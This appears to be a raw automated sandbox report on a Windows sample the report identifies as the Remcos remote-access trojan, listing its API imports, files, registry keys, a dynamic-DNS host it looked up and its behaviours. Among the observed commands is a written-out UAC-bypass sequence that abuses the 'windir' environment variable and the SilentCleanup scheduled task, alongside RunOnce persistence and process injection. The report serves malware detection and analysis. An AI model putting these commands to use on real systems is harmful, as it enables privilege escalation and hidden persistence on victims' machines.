DynamicLoader: kernel32.dll/LoadResource
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/GetThreadLocale
DynamicLoader: kernel32.dll/GetStringTypeExA
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetFullPathNameA
DynamicLoader: kernel32.dll/GetFileAttributesA
DynamicLoader: kernel32.dll/GetExitCodeThread
DynamicLoader: kernel32.dll/GetDiskFreeSpaceA
DynamicLoader: kernel32.dll/GetDateFormatA
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/GetCPInfo
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/FormatMessageA
DynamicLoader: kernel32.dll/FindResourceA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToDosDateTime
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/EnumCalendarInfoA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/CopyFileA
DynamicLoader: kernel32.dll/CompareStringA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: USER32.dll/MessageBoxA
DynamicLoader: USER32.dll/LoadStringA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CharNextA
DynamicLoader: USER32.dll/CharToOemA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: oleaut32.dll/SafeArrayPtrOfIndex
DynamicLoader: oleaut32.dll/SafeArrayGetUBound
DynamicLoader: oleaut32.dll/SafeArrayGetLBound
DynamicLoader: oleaut32.dll/SafeArrayCreate
DynamicLoader: oleaut32.dll/VariantChangeType
DynamicLoader: oleaut32.dll/VariantCopy
DynamicLoader: oleaut32.dll/VariantClear
DynamicLoader: oleaut32.dll/VariantInit
DynamicLoader: shell32.dll/ShellExecuteA
DynamicLoader: URLMON.DLL/URLDownloadToFileA
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/GetModuleHandleA
Reads data out of its own binary image
self_read: process: iz3Ehm6t.exe, pid: 1964, offset: 0x00000000, length: 0x00170c0c
CAPE extracted potentially suspicious content
iz3Ehm6t.exe: : 32-bit DLL
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.54, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0005f200, virtual_size: 0x0005f17c
unknown section: name: DATA, entropy: 3.88, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00001400, virtual_size: 0x00001208
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x0007ad39
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\Public\Natso.bat" "
command: cmd /c ""C:\Users\Public\Yeso.bat" "
command: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
command: C:\Program Files (x86)\internet explorer\ieinstal.exe
command: reg delete hkcu\Environment /v windir /f
command: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
command: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
data: C:\Users\Public\iz3Eh.hta
Creates a copy of itself
copy: C:\Users\Public\iz3Eh\iz3Ehyen.exe
Creates known Remcos mutexes
Creates known Remcos registry keys
Key: HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
junior3431.ddns.net [VT] NXDOMAIN [VT]

Summary

C:\Users\user\AppData\Local\Temp\iz3Ehm6t.ENG
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.ENG.DLL
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.EN
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.EN.DLL
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\OCTAPION.TXT
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
C:\Users\Public\iz3Eh\iz3Ehyen.exe
C:\Windows\Finex
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Windows\SysWOW64
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh
C:\Users\Public\iz3Eh\iz3Eh
C:\Users\Public\iz3Eh.hta
C:\Program Files (x86)\internet explorer\ieinstal.exe
C:\Users\Public
C:\Users
C:\Users\Public\"C:\Users\Public\Natso.bat"
C:\Users\Public\reg.*
C:\Users\Public\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Users\Public\schtasks.*
C:\Users\Public\schtasks
C:\Windows\System32\schtasks.*
C:\Windows\System32\schtasks.COM
C:\Windows\System32\schtasks.exe
C:\Windows\SysWOW64\en-US\reg.exe.mui
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
\Device\KsecDD
\??\MountPointManager
C:\Windows\sysnative\WerFault.exe
C:\Windows
C:\Windows\sysnative
C:\Users\Public\"C:\Users\Public\Yeso.bat"
C:\Windows \System32
C:\Windows \System32\*
C:\Windows \System32\perfmon.exe
C:\Windows \System32\SSPICLI.dll
C:\Users\Public\"C:\Windows \System32\perfmon.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Roaming
C:\Users\user
C:\Users\user\AppData
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh.hta
C:\Windows\SysWOW64\en-US\reg.exe.mui
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\Windows\sysnative\WerFault.exe
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\Temp\iz3Eh
C:\Users\Public\Yako.bat
C:\Users\Public\Natso.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\perfmon.exe
C:\Users\Public\Yeso.bat
C:\Users\Public\iz3Eh\iz3Ehyen.exe
C:\Users\Public\iz3Eh\iz3Eh
C:\Users\Public\iz3Eh.hta
C:\Windows \System32\perfmon.exe
C:\Windows \System32\SSPICLI.dll
C:\Users\Public\Natso.bat
C:\Users\Public\Yako.bat
C:\Users\Public\SSPICLI.dll
C:\Users\Public\Yeso.bat
C:\Users\Public\perfmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_CURRENT_USER
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Environment\windir
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\schtasks.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\msasn1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\NetworkProvider\HwOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEInstal.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\exepath
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\licence
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\override
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Environment\windir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEInstal.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\override
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
HKEY_CURRENT_USER\Environment\windir
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\exepath
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\licence
HKEY_CURRENT_USER\Environment\windir
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.DeleteCriticalSection
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.InitializeCriticalSection
kernel32.dll.VirtualFree
kernel32.dll.VirtualAlloc
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
kernel32.dll.GetVersion
kernel32.dll.GetCurrentThreadId
kernel32.dll.InterlockedDecrement
kernel32.dll.InterlockedIncrement
kernel32.dll.VirtualQuery
kernel32.dll.WideCharToMultiByte
kernel32.dll.MultiByteToWideChar
kernel32.dll.lstrlenA
kernel32.dll.lstrcpynA
kernel32.dll.LoadLibraryExA
kernel32.dll.GetThreadLocale
kernel32.dll.GetStartupInfoA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
kernel32.dll.GetModuleFileNameA
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLastError
kernel32.dll.GetCommandLineA
kernel32.dll.FreeLibrary
kernel32.dll.FindFirstFileA
kernel32.dll.FindClose
kernel32.dll.ExitProcess
kernel32.dll.WriteFile
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.SetFilePointer
kernel32.dll.SetEndOfFile
kernel32.dll.RtlUnwind
kernel32.dll.ReadFile
kernel32.dll.RaiseException
kernel32.dll.GetStdHandle
kernel32.dll.GetFileSize
kernel32.dll.GetFileType
kernel32.dll.CreateFileA
kernel32.dll.CloseHandle
user32.dll.GetKeyboardType
user32.dll.LoadStringA
user32.dll.MessageBoxA
user32.dll.CharNextA
advapi32.dll.RegQueryValueExA
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegCloseKey
oleaut32.dll.SysFreeString
oleaut32.dll.SysReAllocStringLen
oleaut32.dll.SysAllocStringLen
kernel32.dll.TlsSetValue
kernel32.dll.TlsGetValue
kernel32.dll.TlsFree
kernel32.dll.TlsAlloc
advapi32.dll.RegSetValueExA
advapi32.dll.RegFlushKey
advapi32.dll.RegCreateKeyExA
kernel32.dll.lstrcmpiA
kernel32.dll.WriteProcessMemory
kernel32.dll.WaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.VirtualAllocEx
kernel32.dll.Sleep
kernel32.dll.SizeofResource
kernel32.dll.SetEvent
kernel32.dll.ResetEvent
